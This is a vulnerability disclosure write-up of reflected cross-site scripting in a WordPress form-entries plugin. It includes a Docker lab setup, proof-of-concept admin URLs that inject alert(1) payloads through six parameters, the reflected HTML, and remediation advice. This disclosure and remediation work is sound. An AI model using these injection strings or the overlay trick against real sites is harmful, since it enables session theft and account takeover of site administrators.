After the post from last week about CVE-2021-25080 we received another CVE from a similar work on the same plugin. In this case, we found multiple XSS in Contact Entries Plugin: let’s dive into the vulnerability!
Introduction
CRM Form Entries is a plugin that automatically saves form submissions from several WordPress forms:
Setup environment
I set up a Docker environment containing WordPress with the vulnerable plugin:
version: '3.8'
services:
wp:
image: 'dockersecplayground/wp:5.6'
stdin_open: true
tty: true
ports:
- '11080:80'
- '9000:9000'
depends_on:
- db
environment:
- WORDPRESS_DB_HOST=db
- WORDPRESS_DB_USER=dsp
- WORDPRESS_DB_PASSWORD=dsp
- WORDPRESS_DB_NAME=wordpress
volumes:
- './xdebug.ini:/usr/local/etc/php/conf.d/xdebug.ini'
db:
image: 'dockersecplayground/mysql_dsp:latest'
stdin_open: true
tty: true
environment:
- MYSQL_DATABASE=wordpress
- MYSQL_USER=dsp
- MYSQL_PASSWORD=dsp
- MYSQL_RANDOM_ROOT_PASSWORD=1
networks: {}I usually use VS Code to analyze the source code; it is great as it is possible to attach to running containers by using the Docker plugin and Remote Containers plugins.
XSS Vulnerability Description
form_id param of vxcf_leads administrator page is vulnerable to a Reflected Cross-Site-Scripting vulnerability.
First Evidence
The following request:
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+
returns the list of saved entries in the database.
form_id value is reflected in <input> tag.
form_id parameter is not sanitized, so it is possible to inject arbitrary values.
The following request:
http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
Allows to inject onmouseover inside the input form.
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>By moving the mouse inside the click element, the vulnerability is triggered. Even if the vulnerability seems to require the user to move the mouse on the input element, it is possible to improve the attack by just injecting a “style” section that expands the input element with large width and height. In this way, when the user clicks on the link, javascript code is executed.
Second Evidence
status param is vulnerable to most dangerous XSS attack: just send the following request
http://example.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
will execute XSS vulnerability.
Third evidence
end_date has the same as Evidence 2:
http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g
Other evidences
order, orderby and search parameters are also vulnerable to XSS: the following request:
http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=descxg31c%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fd5p60&orderby=fir+ Is reflected in hidden parameter <input type=”hidden” name=”order” value=”descxg31c”accesskey=”x”onclick=”alert(1)”//d5p60″ />
The following request:
http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdtis reflected in hidden input:
<!-- wp:paragraph --><p><em> <input type="hidden" name="orderby" value="fir ihj17"accesskey="x"onclick="alert(1)"//v9tdt" /></em></p><!-- /wp:paragraph --><!-- wp:paragraph --><p><em>search param</em>: <em><a href="http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&" target="_blank" rel="noreferrer noopener">http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&</a>search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=<br></em></p><!-- /wp:paragraph -->Recommendations for Pentesters
The following vulnerability has been found through Burp Suite Scanner.
I have explored all the website links manually, then I have executed Burp Scanner that found the Reflected Cross-Site Scripting vulnerability.
Burp Scanner is optimal when you have the source code as you can deploy it in the local environment and do not have performance issues.
When you analyze a remote website, maybe it could be not as effective, and you should properly choose the fuzzing payloads.
You can explore where the input is reflected manually, or by scripting through a proxy, such as MITM Proxy.
Recommendations for Developers
Sanitize the user input by using safe libraries, or HTML escaping libraries. In WordPress it is possible to use esc_html() function (https://developer.wordpress.org/reference/functions/esc_html/).
Otherwise, OWASP offers a great API developer: https://owasp.org/www-project-enterprise-security-api/https://owasp.org/www-project-enterprise-security-api/